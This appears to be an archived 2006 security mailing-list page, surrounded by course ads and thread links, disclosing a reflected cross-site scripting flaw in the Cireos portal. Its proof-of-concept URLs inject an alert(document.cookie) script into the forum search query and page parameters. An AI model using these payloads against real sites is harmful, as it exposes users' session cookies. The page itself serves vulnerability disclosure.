Network Security: Detailed info on Cireos Portal Cross Site Scripting

Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.

Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.

Network Security Vuln-Dev

Subject:	Cireos Portal Cross Site Scripting
Date:	28 Apr 2006 03:53:42 -0000

Subject:

Cireos Portal Cross Site Scripting

Date:

28 Apr 2006 03:53:42 -0000

#Aria-Security.net Advisory #Discovered by: O.u.t.l.a.w #< www.Aria-security.net> #Gr33t to: A.u.r.a & R@1D3N & Smok3r #----------------------------------------------------------- Software: SirceOS Operative Solutions Link: http://www.circeos.it Attack method: Cross Site Scripting advisory:http://www.aria-security.net/portal/circeos.txt Summary: cireos is a powerfull Portal and featuring a forum Proof of Concept: http://www.victim.com/circeos_path/forum/buscar.php?query=<script>alert(document.cookie)</script><!-- www.site.com/path/index.php?page=<script>alert(document.cookie)</script><!-- Tested On http://www.circeos.it/forum/index.php Solution contact me: Advisory@Aria-Security.net

<Prev in Thread]	Current Thread	[Next in Thread>
Cireos Portal Cross Site Scripting, outlaw <=

<Prev in Thread]

Current Thread

[Next in Thread>

Previous by Date:	[ECHO_ADV_31$2006] Sws Web Server 0.1.7 Strcpy() & Syslog() Format String Vulnerability, the_day
Next by Date:	[Full-disclosure] [Argeniss] Alert - Yahoo! Mail XSS vulnerability, Cesar
Previous by Thread:	[ECHO_ADV_31$2006] Sws Web Server 0.1.7 Strcpy() & Syslog() Format String Vulnerability, the_day
Next by Thread:	[Full-disclosure] [Argeniss] Alert - Yahoo! Mail XSS vulnerability, Cesar
Indexes:	[Date] [Thread] [Top] [All Lists]

Previous by Date:

[ECHO_ADV_31$2006] Sws Web Server 0.1.7 Strcpy() & Syslog() Format String Vulnerability, the_day

Next by Date:

[Full-disclosure] [Argeniss] Alert - Yahoo! Mail XSS vulnerability, Cesar

Previous by Thread:

[ECHO_ADV_31$2006] Sws Web Server 0.1.7 Strcpy() & Syslog() Format String Vulnerability, the_day

Next by Thread:

[Full-disclosure] [Argeniss] Alert - Yahoo! Mail XSS vulnerability, Cesar

Indexes:

[Date] [Thread] [Top] [All Lists]